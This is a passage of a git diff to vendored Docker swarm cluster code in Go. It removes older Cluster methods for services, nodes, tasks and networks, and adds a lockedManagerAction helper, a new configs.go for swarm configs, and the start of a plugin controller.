-			resp.Warnings = append(resp.Warnings, fmt.Sprintf("unable to pin image %s to digest: %s", ctnr.Image, err.Error()))
-		} else if ctnr.Image != digestImage {
-			logrus.Debugf("pinning image %s by digest: %s", ctnr.Image, digestImage)
-			ctnr.Image = digestImage
-		} else {
-			logrus.Debugf("creating service using supplied digest reference %s", ctnr.Image)
-		}
-	}
-
-	r, err := c.client.CreateService(ctx, &swarmapi.CreateServiceRequest{Spec: &serviceSpec})
-	if err != nil {
-		return nil, err
-	}
-
-	resp.ID = r.Service.ID
-	return resp, nil
-}
-
-// GetService returns a service based on an ID or name.
-func (c *Cluster) GetService(input string) (types.Service, error) {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return types.Service{}, c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	service, err := getService(ctx, c.client, input)
-	if err != nil {
-		return types.Service{}, err
-	}
-	return convert.ServiceFromGRPC(*service), nil
-}
-
-// UpdateService updates existing service to match new properties.
-func (c *Cluster) UpdateService(serviceIDOrName string, version uint64, spec types.ServiceSpec, encodedAuth string, registryAuthFrom string) (*apitypes.ServiceUpdateResponse, error) {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return nil, c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	err := c.populateNetworkID(ctx, c.client, &spec)
-	if err != nil {
-		return nil, err
-	}
-
-	serviceSpec, err := convert.ServiceSpecToGRPC(spec)
-	if err != nil {
-		return nil, err
-	}
-
-	currentService, err := getService(ctx, c.client, serviceIDOrName)
-	if err != nil {
-		return nil, err
-	}
-
-	newCtnr := serviceSpec.Task.GetContainer()
-	if newCtnr == nil {
-		return nil, fmt.Errorf("service does not use container tasks")
-	}
-
-	if encodedAuth != "" {
-		newCtnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth}
-	} else {
-		// this is needed because if the encodedAuth isn't being updated then we
-		// shouldn't lose it, and continue to use the one that was already present
-		var ctnr *swarmapi.ContainerSpec
-		switch registryAuthFrom {
-		case apitypes.RegistryAuthFromSpec, "":
-			ctnr = currentService.Spec.Task.GetContainer()
-		case apitypes.RegistryAuthFromPreviousSpec:
-			if currentService.PreviousSpec == nil {
-				return nil, fmt.Errorf("service does not have a previous spec")
-			}
-			ctnr = currentService.PreviousSpec.Task.GetContainer()
-		default:
-			return nil, fmt.Errorf("unsupported registryAuthFromValue")
-		}
-		if ctnr == nil {
-			return nil, fmt.Errorf("service does not use container tasks")
-		}
-		newCtnr.PullOptions = ctnr.PullOptions
-		// update encodedAuth so it can be used to pin image by digest
-		if ctnr.PullOptions != nil {
-			encodedAuth = ctnr.PullOptions.RegistryAuth
-		}
-	}
-
-	// retrieve auth config from encoded auth
-	authConfig := &apitypes.AuthConfig{}
-	if encodedAuth != "" {
-		if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuth))).Decode(authConfig); err != nil {
-			logrus.Warnf("invalid authconfig: %v", err)
-		}
-	}
-
-	resp := &apitypes.ServiceUpdateResponse{}
-
-	// pin image by digest
-	if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" {
-		digestImage, err := c.imageWithDigestString(ctx, newCtnr.Image, authConfig)
-		if err != nil {
-			logrus.Warnf("unable to pin image %s to digest: %s", newCtnr.Image, err.Error())
-			resp.Warnings = append(resp.Warnings, fmt.Sprintf("unable to pin image %s to digest: %s", newCtnr.Image, err.Error()))
-		} else if newCtnr.Image != digestImage {
-			logrus.Debugf("pinning image %s by digest: %s", newCtnr.Image, digestImage)
-			newCtnr.Image = digestImage
-		} else {
-			logrus.Debugf("updating service using supplied digest reference %s", newCtnr.Image)
-		}
-	}
-
-	_, err = c.client.UpdateService(
-		ctx,
-		&swarmapi.UpdateServiceRequest{
-			ServiceID: currentService.ID,
-			Spec:      &serviceSpec,
-			ServiceVersion: &swarmapi.Version{
-				Index: version,
-			},
-		},
-	)
-
-	return resp, err
-}
-
-// RemoveService removes a service from a managed swarm cluster.
-func (c *Cluster) RemoveService(input string) error {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	service, err := getService(ctx, c.client, input)
-	if err != nil {
-		return err
-	}
-
-	if _, err := c.client.RemoveService(ctx, &swarmapi.RemoveServiceRequest{ServiceID: service.ID}); err != nil {
-		return err
-	}
-	return nil
-}
-
-// ServiceLogs collects service logs and writes them back to `config.OutStream`
-func (c *Cluster) ServiceLogs(ctx context.Context, input string, config *backend.ContainerLogsConfig, started chan struct{}) error {
-	c.RLock()
-	if !c.isActiveManager() {
-		c.RUnlock()
-		return c.errNoManager()
-	}
-
-	service, err := getService(ctx, c.client, input)
-	if err != nil {
-		c.RUnlock()
-		return err
-	}
-
-	stream, err := c.logs.SubscribeLogs(ctx, &swarmapi.SubscribeLogsRequest{
-		Selector: &swarmapi.LogSelector{
-			ServiceIDs: []string{service.ID},
-		},
-		Options: &swarmapi.LogSubscriptionOptions{
-			Follow: config.Follow,
-		},
-	})
-	if err != nil {
-		c.RUnlock()
-		return err
-	}
-
-	wf := ioutils.NewWriteFlusher(config.OutStream)
-	defer wf.Close()
-	close(started)
-	wf.Flush()
-
-	outStream := stdcopy.NewStdWriter(wf, stdcopy.Stdout)
-	errStream := stdcopy.NewStdWriter(wf, stdcopy.Stderr)
-
-	// Release the lock before starting the stream.
-	c.RUnlock()
-	for {
-		// Check the context before doing anything.
-		select {
-		case <-ctx.Done():
-			return ctx.Err()
-		default:
-		}
-
-		subscribeMsg, err := stream.Recv()
-		if err == io.EOF {
-			return nil
-		}
-		if err != nil {
-			return err
-		}
-
-		for _, msg := range subscribeMsg.Messages {
-			data := []byte{}
-
-			if config.Timestamps {
-				ts, err := ptypes.Timestamp(msg.Timestamp)
-				if err != nil {
-					return err
-				}
-				data = append(data, []byte(ts.Format(logger.TimeFormat)+" ")...)
-			}
-
-			data = append(data, []byte(fmt.Sprintf("%s.node.id=%s,%s.service.id=%s,%s.task.id=%s ",
-				contextPrefix, msg.Context.NodeID,
-				contextPrefix, msg.Context.ServiceID,
-				contextPrefix, msg.Context.TaskID,
-			))...)
-
-			data = append(data, msg.Data...)
-
-			switch msg.Stream {
-			case swarmapi.LogStreamStdout:
-				outStream.Write(data)
-			case swarmapi.LogStreamStderr:
-				errStream.Write(data)
-			}
-		}
-	}
-}
-
-// GetNodes returns a list of all nodes known to a cluster.
-func (c *Cluster) GetNodes(options apitypes.NodeListOptions) ([]types.Node, error) {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return nil, c.errNoManager()
-	}
-
-	filters, err := newListNodesFilters(options.Filters)
-	if err != nil {
-		return nil, err
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	r, err := c.client.ListNodes(
-		ctx,
-		&swarmapi.ListNodesRequest{Filters: filters})
-	if err != nil {
-		return nil, err
-	}
-
-	nodes := []types.Node{}
-
-	for _, node := range r.Nodes {
-		nodes = append(nodes, convert.NodeFromGRPC(*node))
-	}
-	return nodes, nil
-}
-
-// GetNode returns a node based on an ID or name.
-func (c *Cluster) GetNode(input string) (types.Node, error) {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return types.Node{}, c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	node, err := getNode(ctx, c.client, input)
-	if err != nil {
-		return types.Node{}, err
-	}
-	return convert.NodeFromGRPC(*node), nil
-}
-
-// UpdateNode updates existing nodes properties.
-func (c *Cluster) UpdateNode(input string, version uint64, spec types.NodeSpec) error {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return c.errNoManager()
-	}
-
-	nodeSpec, err := convert.NodeSpecToGRPC(spec)
-	if err != nil {
-		return err
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	currentNode, err := getNode(ctx, c.client, input)
-	if err != nil {
-		return err
-	}
-
-	_, err = c.client.UpdateNode(
-		ctx,
-		&swarmapi.UpdateNodeRequest{
-			NodeID: currentNode.ID,
-			Spec:   &nodeSpec,
-			NodeVersion: &swarmapi.Version{
-				Index: version,
-			},
-		},
-	)
-	return err
-}
-
-// RemoveNode removes a node from a cluster
-func (c *Cluster) RemoveNode(input string, force bool) error {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	node, err := getNode(ctx, c.client, input)
-	if err != nil {
-		return err
-	}
-
-	if _, err := c.client.RemoveNode(ctx, &swarmapi.RemoveNodeRequest{NodeID: node.ID, Force: force}); err != nil {
-		return err
-	}
-	return nil
-}
-
-// GetTasks returns a list of tasks matching the filter options.
-func (c *Cluster) GetTasks(options apitypes.TaskListOptions) ([]types.Task, error) {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return nil, c.errNoManager()
-	}
-
-	byName := func(filter filters.Args) error {
-		if filter.Include("service") {
-			serviceFilters := filter.Get("service")
-			for _, serviceFilter := range serviceFilters {
-				service, err := c.GetService(serviceFilter)
-				if err != nil {
-					return err
-				}
-				filter.Del("service", serviceFilter)
-				filter.Add("service", service.ID)
-			}
-		}
-		if filter.Include("node") {
-			nodeFilters := filter.Get("node")
-			for _, nodeFilter := range nodeFilters {
-				node, err := c.GetNode(nodeFilter)
-				if err != nil {
-					return err
-				}
-				filter.Del("node", nodeFilter)
-				filter.Add("node", node.ID)
-			}
-		}
-		return nil
-	}
-
-	filters, err := newListTasksFilters(options.Filters, byName)
-	if err != nil {
-		return nil, err
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	r, err := c.client.ListTasks(
-		ctx,
-		&swarmapi.ListTasksRequest{Filters: filters})
-	if err != nil {
-		return nil, err
-	}
-
-	tasks := []types.Task{}
-
-	for _, task := range r.Tasks {
-		if task.Spec.GetContainer() != nil {
-			tasks = append(tasks, convert.TaskFromGRPC(*task))
-		}
-	}
-	return tasks, nil
-}
-
-// GetTask returns a task by an ID.
-func (c *Cluster) GetTask(input string) (types.Task, error) {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return types.Task{}, c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	task, err := getTask(ctx, c.client, input)
-	if err != nil {
-		return types.Task{}, err
-	}
-	return convert.TaskFromGRPC(*task), nil
-}
-
-// GetNetwork returns a cluster network by an ID.
-func (c *Cluster) GetNetwork(input string) (apitypes.NetworkResource, error) {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return apitypes.NetworkResource{}, c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	network, err := getNetwork(ctx, c.client, input)
-	if err != nil {
-		return apitypes.NetworkResource{}, err
-	}
-	return convert.BasicNetworkFromGRPC(*network), nil
-}
-
-func (c *Cluster) getNetworks(filters *swarmapi.ListNetworksRequest_Filters) ([]apitypes.NetworkResource, error) {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return nil, c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	r, err := c.client.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: filters})
-	if err != nil {
-		return nil, err
-	}
-
-	var networks []apitypes.NetworkResource
-
-	for _, network := range r.Networks {
-		networks = append(networks, convert.BasicNetworkFromGRPC(*network))
-	}
-
-	return networks, nil
-}
-
-// GetNetworks returns all current cluster managed networks.
-func (c *Cluster) GetNetworks() ([]apitypes.NetworkResource, error) {
-	return c.getNetworks(nil)
-}
-
-// GetNetworksByName returns cluster managed networks by name.
-// It is ok to have multiple networks here. #18864
-func (c *Cluster) GetNetworksByName(name string) ([]apitypes.NetworkResource, error) {
-	// Note that swarmapi.GetNetworkRequest.Name is not functional.
-	// So we cannot just use that with c.GetNetwork.
-	return c.getNetworks(&swarmapi.ListNetworksRequest_Filters{
-		Names: []string{name},
-	})
-}
-
-func attacherKey(target, containerID string) string {
-	return containerID + ":" + target
-}
-
-// UpdateAttachment signals the attachment config to the attachment
-// waiter who is trying to start or attach the container to the
-// network.
-func (c *Cluster) UpdateAttachment(target, containerID string, config *network.NetworkingConfig) error {
-	c.RLock()
-	attacher, ok := c.attachers[attacherKey(target, containerID)]
-	c.RUnlock()
-	if !ok || attacher == nil {
-		return fmt.Errorf("could not find attacher for container %s to network %s", containerID, target)
-	}
-
-	attacher.attachWaitCh <- config
-	close(attacher.attachWaitCh)
-	return nil
-}
-
-// WaitForDetachment waits for the container to stop or detach from
-// the network.
-func (c *Cluster) WaitForDetachment(ctx context.Context, networkName, networkID, taskID, containerID string) error {
-	c.RLock()
-	attacher, ok := c.attachers[attacherKey(networkName, containerID)]
-	if !ok {
-		attacher, ok = c.attachers[attacherKey(networkID, containerID)]
-	}
-	if c.node == nil || c.node.Agent() == nil {
-		c.RUnlock()
-		return fmt.Errorf("invalid cluster node while waiting for detachment")
-	}
-
-	agent := c.node.Agent()
-	c.RUnlock()
-
-	if ok && attacher != nil &&
-		attacher.detachWaitCh != nil &&
-		attacher.attachCompleteCh != nil {
-		// Attachment may be in progress still so wait for
-		// attachment to complete.
-		select {
-		case <-attacher.attachCompleteCh:
-		case <-ctx.Done():
-			return ctx.Err()
-		}
-
-		if attacher.taskID == taskID {
-			select {
-			case <-attacher.detachWaitCh:
-			case <-ctx.Done():
-				return ctx.Err()
-			}
-		}
-	}
-
-	return agent.ResourceAllocator().DetachNetwork(ctx, taskID)
-}
-
-// AttachNetwork generates an attachment request towards the manager.
-func (c *Cluster) AttachNetwork(target string, containerID string, addresses []string) (*network.NetworkingConfig, error) {
-	aKey := attacherKey(target, containerID)
-	c.Lock()
-	if c.node == nil || c.node.Agent() == nil {
-		c.Unlock()
-		return nil, fmt.Errorf("invalid cluster node while attaching to network")
-	}
-	if attacher, ok := c.attachers[aKey]; ok {
-		c.Unlock()
-		return attacher.config, nil
-	}
-
-	agent := c.node.Agent()
-	attachWaitCh := make(chan *network.NetworkingConfig)
-	detachWaitCh := make(chan struct{})
-	attachCompleteCh := make(chan struct{})
-	c.attachers[aKey] = &attacher{
-		attachWaitCh:     attachWaitCh,
-		attachCompleteCh: attachCompleteCh,
-		detachWaitCh:     detachWaitCh,
-	}
-	c.Unlock()
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	taskID, err := agent.ResourceAllocator().AttachNetwork(ctx, containerID, target, addresses)
-	if err != nil {
-		c.Lock()
-		delete(c.attachers, aKey)
-		c.Unlock()
-		return nil, fmt.Errorf("Could not attach to network %s: %v", target, err)
-	}
-
-	c.Lock()
-	c.attachers[aKey].taskID = taskID
-	close(attachCompleteCh)
-	c.Unlock()
-
-	logrus.Debugf("Successfully attached to network %s with tid %s", target, taskID)
-
-	var config *network.NetworkingConfig
-	select {
-	case config = <-attachWaitCh:
-	case <-ctx.Done():
-		return nil, fmt.Errorf("attaching to network failed, make sure your network options are correct and check manager logs: %v", ctx.Err())
-	}
-
-	c.Lock()
-	c.attachers[aKey].config = config
-	c.Unlock()
-	return config, nil
-}
-
-// DetachNetwork unblocks the waiters waiting on WaitForDetachment so
-// that a request to detach can be generated towards the manager.
-func (c *Cluster) DetachNetwork(target string, containerID string) error {
-	aKey := attacherKey(target, containerID)
-
-	c.Lock()
-	attacher, ok := c.attachers[aKey]
-	delete(c.attachers, aKey)
-	c.Unlock()
-
-	if !ok {
-		return fmt.Errorf("could not find network attachment for container %s to network %s", containerID, target)
-	}
-
-	close(attacher.detachWaitCh)
-	return nil
-}
-
-// CreateNetwork creates a new cluster managed network.
-func (c *Cluster) CreateNetwork(s apitypes.NetworkCreateRequest) (string, error) {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return "", c.errNoManager()
-	}
-
-	if runconfig.IsPreDefinedNetwork(s.Name) {
-		err := fmt.Errorf("%s is a pre-defined network and cannot be created", s.Name)
-		return "", apierrors.NewRequestForbiddenError(err)
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	networkSpec := convert.BasicNetworkCreateToGRPC(s)
-	r, err := c.client.CreateNetwork(ctx, &swarmapi.CreateNetworkRequest{Spec: &networkSpec})
-	if err != nil {
-		return "", err
-	}
-
-	return r.Network.ID, nil
-}
-
-// RemoveNetwork removes a cluster network.
-func (c *Cluster) RemoveNetwork(input string) error {
-	c.RLock()
-	defer c.RUnlock()
-
-	if !c.isActiveManager() {
-		return c.errNoManager()
-	}
-
-	ctx, cancel := c.getRequestContext()
-	defer cancel()
-
-	network, err := getNetwork(ctx, c.client, input)
-	if err != nil {
-		return err
-	}
-
-	if _, err := c.client.RemoveNetwork(ctx, &swarmapi.RemoveNetworkRequest{NetworkID: network.ID}); err != nil {
-		return err
-	}
-	return nil
-}
-
-func (c *Cluster) populateNetworkID(ctx context.Context, client swarmapi.ControlClient, s *types.ServiceSpec) error {
-	// Always prefer NetworkAttachmentConfigs from TaskTemplate
-	// but fallback to service spec for backward compatibility
-	networks := s.TaskTemplate.Networks
-	if len(networks) == 0 {
-		networks = s.Networks
-	}
-
-	for i, n := range networks {
-		apiNetwork, err := getNetwork(ctx, client, n.Target)
-		if err != nil {
-			if ln, _ := c.config.Backend.FindNetwork(n.Target); ln != nil && !ln.Info().Dynamic() {
-				err = fmt.Errorf("The network %s cannot be used with services. Only networks scoped to the swarm can be used, such as those created with the overlay driver.", ln.Name())
-				return apierrors.NewRequestForbiddenError(err)
-			}
-			return err
-		}
-		networks[i].Target = apiNetwork.ID
-	}
-	return nil
-}
-
-func getNetwork(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Network, error) {
-	// GetNetwork to match via full ID.
-	rg, err := c.GetNetwork(ctx, &swarmapi.GetNetworkRequest{NetworkID: input})
-	if err != nil {
-		// If any error (including NotFound), ListNetworks to match via ID prefix and full name.
-		rl, err := c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: &swarmapi.ListNetworksRequest_Filters{Names: []string{input}}})
-		if err != nil || len(rl.Networks) == 0 {
-			rl, err = c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: &swarmapi.ListNetworksRequest_Filters{IDPrefixes: []string{input}}})
-		}
-
-		if err != nil {
-			return nil, err
-		}
-
-		if len(rl.Networks) == 0 {
-			return nil, fmt.Errorf("network %s not found", input)
-		}
-
-		if l := len(rl.Networks); l > 1 {
-			return nil, fmt.Errorf("network %s is ambiguous (%d matches found)", input, l)
-		}
-
-		return rl.Networks[0], nil
-	}
-	return rg.Network, nil
-}
-
-// Cleanup stops active swarm node. This is run before daemon shutdown.
-func (c *Cluster) Cleanup() {
-	c.Lock()
-	node := c.node
-	if node == nil {
-		c.Unlock()
-		return
-	}
-	defer c.Unlock()
-	if c.isActiveManager() {
-		active, reachable, unreachable, err := c.managerStats()
-		if err == nil {
-			singlenode := active && isLastManager(reachable, unreachable)
-			if active && !singlenode && removingManagerCausesLossOfQuorum(reachable, unreachable) {
-				logrus.Errorf("Leaving cluster with %v managers left out of %v. Raft quorum will be lost.", reachable-1, reachable+unreachable)
-			}
-		}
-	}
-	c.stopNode()
-}
-
-func (c *Cluster) managerStats() (current bool, reachable int, unreachable int, err error) {
+func managerStats(client swarmapi.ControlClient, currentNodeID string) (current bool, reachable int, unreachable int, err error) {
 	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
 	defer cancel()
-	nodes, err := c.client.ListNodes(ctx, &swarmapi.ListNodesRequest{})
+	nodes, err := client.ListNodes(ctx, &swarmapi.ListNodesRequest{})
 	if err != nil {
 		return false, 0, 0, err
 	}
@@ -1860,7 +405,7 @@ func (c *Cluster) managerStats() (current bool, reachable int, unreachable int,
 		if n.ManagerStatus != nil {
 			if n.ManagerStatus.Reachability == swarmapi.RaftMemberStatus_REACHABLE {
 				reachable++
-				if n.ID == c.node.NodeID() {
+				if n.ID == currentNodeID {
 					current = true
 				}
 			}
@@ -1872,102 +417,34 @@ func (c *Cluster) managerStats() (current bool, reachable int, unreachable int,
 	return
 }
 
-func validateAndSanitizeInitRequest(req *types.InitRequest) error {
-	var err error
-	req.ListenAddr, err = validateAddr(req.ListenAddr)
-	if err != nil {
-		return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err)
-	}
-
-	if req.Spec.Annotations.Name == "" {
-		req.Spec.Annotations.Name = "default"
-	} else if req.Spec.Annotations.Name != "default" {
-		return errors.New(`swarm spec must be named "default"`)
+func detectLockedError(err error) error {
+	if err == swarmnode.ErrInvalidUnlockKey {
+		return errors.WithStack(errSwarmLocked)
 	}
-
-	return nil
+	return err
 }
 
-func validateAndSanitizeJoinRequest(req *types.JoinRequest) error {
-	var err error
-	req.ListenAddr, err = validateAddr(req.ListenAddr)
-	if err != nil {
-		return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err)
-	}
-	if len(req.RemoteAddrs) == 0 {
-		return fmt.Errorf("at least 1 RemoteAddr is required to join")
-	}
-	for i := range req.RemoteAddrs {
-		req.RemoteAddrs[i], err = validateAddr(req.RemoteAddrs[i])
-		if err != nil {
-			return fmt.Errorf("invalid remoteAddr %q: %v", req.RemoteAddrs[i], err)
-		}
-	}
-	return nil
-}
+func (c *Cluster) lockedManagerAction(fn func(ctx context.Context, state nodeState) error) error {
+	c.mu.RLock()
+	defer c.mu.RUnlock()
 
-func validateAddr(addr string) (string, error) {
-	if addr == "" {
-		return addr, fmt.Errorf("invalid empty address")
-	}
-	newaddr, err := opts.ParseTCPAddr(addr, defaultAddr)
-	if err != nil {
-		return addr, nil
+	state := c.currentNodeState()
+	if !state.IsActiveManager() {
+		return c.errNoManager(state)
 	}
-	return strings.TrimPrefix(newaddr, "tcp://"), nil
-}
 
-func initClusterSpec(node *node, spec types.Spec) error {
-	ctx, _ := context.WithTimeout(context.Background(), 5*time.Second)
-	for conn := range node.ListenControlSocket(ctx) {
-		if ctx.Err() != nil {
-			return ctx.Err()
-		}
-		if conn != nil {
-			client := swarmapi.NewControlClient(conn)
-			var cluster *swarmapi.Cluster
-			for i := 0; ; i++ {
-				lcr, err := client.ListClusters(ctx, &swarmapi.ListClustersRequest{})
-				if err != nil {
-					return fmt.Errorf("error on listing clusters: %v", err)
-				}
-				if len(lcr.Clusters) == 0 {
-					if i < 10 {
-						time.Sleep(200 * time.Millisecond)
-						continue
-					}
-					return fmt.Errorf("empty list of clusters was returned")
-				}
-				cluster = lcr.Clusters[0]
-				break
-			}
-			// In init, we take the initial default values from swarmkit, and merge
-			// any non nil or 0 value from spec to GRPC spec. This will leave the
-			// default value alone.
-			// Note that this is different from Update(), as in Update() we expect
-			// user to specify the complete spec of the cluster (as they already know
-			// the existing one and knows which field to update)
-			clusterSpec, err := convert.MergeSwarmSpecToGRPC(spec, cluster.Spec)
-			if err != nil {
-				return fmt.Errorf("error updating cluster settings: %v", err)
-			}
-			_, err = client.UpdateCluster(ctx, &swarmapi.UpdateClusterRequest{
-				ClusterID:      cluster.ID,
-				ClusterVersion: &cluster.Meta.Version,
-				Spec:           &clusterSpec,
-			})
-			if err != nil {
-				return fmt.Errorf("error updating cluster settings: %v", err)
-			}
-			return nil
-		}
-	}
-	return ctx.Err()
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	return fn(ctx, state)
 }
 
-func detectLockedError(err error) error {
-	if err == swarmnode.ErrInvalidUnlockKey {
-		return errors.WithStack(ErrSwarmLocked)
-	}
-	return err
+// SendClusterEvent allows to send cluster events on the configEvent channel
+// TODO This method should not be exposed.
+// Currently it is used to notify the network controller that the keys are
+// available
+func (c *Cluster) SendClusterEvent(event lncluster.ConfigEventType) {
+	c.mu.RLock()
+	defer c.mu.RUnlock()
+	c.configEvent <- event
 }
diff --git a/vendor/github.com/docker/docker/daemon/cluster/configs.go b/vendor/github.com/docker/docker/daemon/cluster/configs.go
new file mode 100644
index 0000000000..6b373e618b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/configs.go
@@ -0,0 +1,118 @@
+package cluster // import "github.com/docker/docker/daemon/cluster"
+
+import (
+	"context"
+
+	apitypes "github.com/docker/docker/api/types"
+	types "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/daemon/cluster/convert"
+	swarmapi "github.com/docker/swarmkit/api"
+)
+
+// GetConfig returns a config from a managed swarm cluster
+func (c *Cluster) GetConfig(input string) (types.Config, error) {
+	var config *swarmapi.Config
+
+	if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		s, err := getConfig(ctx, state.controlClient, input)
+		if err != nil {
+			return err
+		}
+		config = s
+		return nil
+	}); err != nil {
+		return types.Config{}, err
+	}
+	return convert.ConfigFromGRPC(config), nil
+}
+
+// GetConfigs returns all configs of a managed swarm cluster.
+func (c *Cluster) GetConfigs(options apitypes.ConfigListOptions) ([]types.Config, error) {
+	c.mu.RLock()
+	defer c.mu.RUnlock()
+
+	state := c.currentNodeState()
+	if !state.IsActiveManager() {
+		return nil, c.errNoManager(state)
+	}
+
+	filters, err := newListConfigsFilters(options.Filters)
+	if err != nil {
+		return nil, err
+	}
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	r, err := state.controlClient.ListConfigs(ctx,
+		&swarmapi.ListConfigsRequest{Filters: filters})
+	if err != nil {
+		return nil, err
+	}
+
+	configs := []types.Config{}
+
+	for _, config := range r.Configs {
+		configs = append(configs, convert.ConfigFromGRPC(config))
+	}
+
+	return configs, nil
+}
+
+// CreateConfig creates a new config in a managed swarm cluster.
+func (c *Cluster) CreateConfig(s types.ConfigSpec) (string, error) {
+	var resp *swarmapi.CreateConfigResponse
+	if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		configSpec := convert.ConfigSpecToGRPC(s)
+
+		r, err := state.controlClient.CreateConfig(ctx,
+			&swarmapi.CreateConfigRequest{Spec: &configSpec})
+		if err != nil {
+			return err
+		}
+		resp = r
+		return nil
+	}); err != nil {
+		return "", err
+	}
+	return resp.Config.ID, nil
+}
+
+// RemoveConfig removes a config from a managed swarm cluster.
+func (c *Cluster) RemoveConfig(input string) error {
+	return c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		config, err := getConfig(ctx, state.controlClient, input)
+		if err != nil {
+			return err
+		}
+
+		req := &swarmapi.RemoveConfigRequest{
+			ConfigID: config.ID,
+		}
+
+		_, err = state.controlClient.RemoveConfig(ctx, req)
+		return err
+	})
+}
+
+// UpdateConfig updates a config in a managed swarm cluster.
+// Note: this is not exposed to the CLI but is available from the API only
+func (c *Cluster) UpdateConfig(input string, version uint64, spec types.ConfigSpec) error {
+	return c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		config, err := getConfig(ctx, state.controlClient, input)
+		if err != nil {
+			return err
+		}
+
+		configSpec := convert.ConfigSpecToGRPC(spec)
+
+		_, err = state.controlClient.UpdateConfig(ctx,
+			&swarmapi.UpdateConfigRequest{
+				ConfigID: config.ID,
+				ConfigVersion: &swarmapi.Version{
+					Index: version,
+				},
+				Spec: &configSpec,
+			})
+		return err
+	})
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller.go b/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller.go
new file mode 100644
index 0000000000..6d7606aa84
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller.go
@@ -0,0 +1,261 @@
+package plugin // import "github.com/docker/docker/daemon/cluster/controllers/plugin"
+
+import (
+	"context"
+	"io"
+	"io/ioutil"
+	"net/http"
+
+	"github.com/docker/distribution/reference"
+	enginetypes "github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm/runtime"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/plugin"
+	"github.com/docker/docker/plugin/v2"
+	"github.com/docker/swarmkit/api"
+	"github.com/gogo/protobuf/proto"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+// Controller is the controller for the plugin backend.
+// Plugins are managed as a singleton object with a desired state (different from containers).
+// With the plugin controller instead of having a strict create->start->stop->remove
+// task lifecycle like containers, we manage the desired state of the plugin and let
+// the plugin manager do what it already does and monitor the plugin.
+// We'll also end up with many tasks all pointing to the same plugin ID.
+//
+// TODO(@cpuguy83): registry auth is intentionally not supported until we work out
+// the right way to pass registry credentials via secrets.
+type Controller struct {
+	backend Backend
+	spec    runtime.PluginSpec
+	logger  *logrus.Entry
+
+	pluginID  string
+	serviceID string
+	taskID    string
+
+	// hook used to signal tests that `Wait()` is actually ready and waiting
+	signalWaitReady func()
+}
+
+// Backend is the interface for interacting with the plugin manager
+// Controller actions are passed to the configured backend to do the real work.
+type Backend interface {
+	Disable(name string, config *enginetypes.PluginDisableConfig) error
+	Enable(name string, config *enginetypes.PluginEnableConfig) error
+	Remove(name string, config *enginetypes.PluginRmConfig) error
+	Pull(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer, opts ...plugin.CreateOpt) error
+	Upgrade(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer) error
+	Get(name string) (*v2.Plugin, error)
+	SubscribeEvents(buffer int, events ...plugin.Event) (eventCh <-chan interface{}, cancel func())
+}
+
+// NewController returns a new cluster plugin controller
